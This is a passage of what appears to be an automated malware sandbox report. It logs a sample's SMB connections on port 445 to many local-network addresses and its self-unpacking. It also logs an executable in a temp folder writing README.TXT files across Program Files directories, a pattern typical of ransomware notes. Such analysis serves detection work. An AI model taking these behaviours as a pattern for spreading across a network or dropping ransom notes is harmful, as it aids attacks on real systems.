                          Source: global trafficTCP traffic: 192.168.2.71:445
                          Source: global trafficTCP traffic: 192.168.2.199:445
                          Source: global trafficTCP traffic: 192.168.2.70:445
                          Source: global trafficTCP traffic: 192.168.2.73:445
                          Source: global trafficTCP traffic: 192.168.2.197:445
                          Source: global trafficTCP traffic: 192.168.2.72:445
                          Source: global trafficTCP traffic: 192.168.2.198:445
                          Source: global trafficTCP traffic: 192.168.2.64:445
                          Source: global trafficTCP traffic: 192.168.2.63:445
                          Source: global trafficTCP traffic: 192.168.2.66:445
                          Source: global trafficTCP traffic: 192.168.2.168:445
                          Source: global trafficTCP traffic: 192.168.2.65:445
                          Source: global trafficTCP traffic: 192.168.2.169:445
                          Source: global trafficTCP traffic: 192.168.2.68:445
                          Source: global trafficTCP traffic: 192.168.2.67:445
                          Source: global trafficTCP traffic: 192.168.2.69:445
                          Source: global trafficTCP traffic: 192.168.2.162:445
                          Source: global trafficTCP traffic: 192.168.2.163:445
                          Source: global trafficTCP traffic: 192.168.2.160:445
                          Source: global trafficTCP traffic: 192.168.2.161:445
                          Source: global trafficTCP traffic: 192.168.2.60:445
                          Source: global trafficTCP traffic: 192.168.2.166:445
                          Source: global trafficTCP traffic: 192.168.2.167:445
                          Source: global trafficTCP traffic: 192.168.2.62:445
                          Source: global trafficTCP traffic: 192.168.2.164:445
                          Source: global trafficTCP traffic: 192.168.2.61:445
                          Source: global trafficTCP traffic: 192.168.2.165:445
                          Source: global trafficTCP traffic: 192.168.2.170:445
                          Source: global trafficTCP traffic: 192.168.2.49:445
                          Source: global trafficTCP traffic: 192.168.2.53:445
                          Source: global trafficTCP traffic: 192.168.2.52:445
                          Source: global trafficTCP traffic: 192.168.2.55:445
                          Source: global trafficTCP traffic: 192.168.2.179:445
                          Source: global trafficTCP traffic: 192.168.2.54:445
                          Source: global trafficTCP traffic: 192.168.2.57:445
                          Source: global trafficTCP traffic: 192.168.2.56:445
                          Source: global trafficTCP traffic: 192.168.2.59:445
                          Source: global trafficTCP traffic: 192.168.2.58:445
                          Source: global trafficTCP traffic: 192.168.2.173:445
                          Source: global trafficTCP traffic: 192.168.2.174:445
                          Source: global trafficTCP traffic: 192.168.2.171:445
                          Source: global trafficTCP traffic: 192.168.2.172:445
                          Source: global trafficTCP traffic: 192.168.2.177:445
                          Source: global trafficTCP traffic: 192.168.2.178:445
                          Source: global trafficTCP traffic: 192.168.2.51:445
                          Source: global trafficTCP traffic: 192.168.2.175:445
                          Source: global trafficTCP traffic: 192.168.2.50:445
                          Source: global trafficTCP traffic: 192.168.2.176:445

                          Compliance

                          barindex
                          Detected unpacking (overwrites its own PE header)
                          Source: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exeUnpacked PE file: 7.2.4508a44a11.exe.400000.0.unpack
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Microsoft Office 15\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Uninstall Information\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\7-Zip\Lang\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\7-Zip\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Adobe\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Mac\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\win\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\versions\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\core\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\files\dev\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\README.TXT
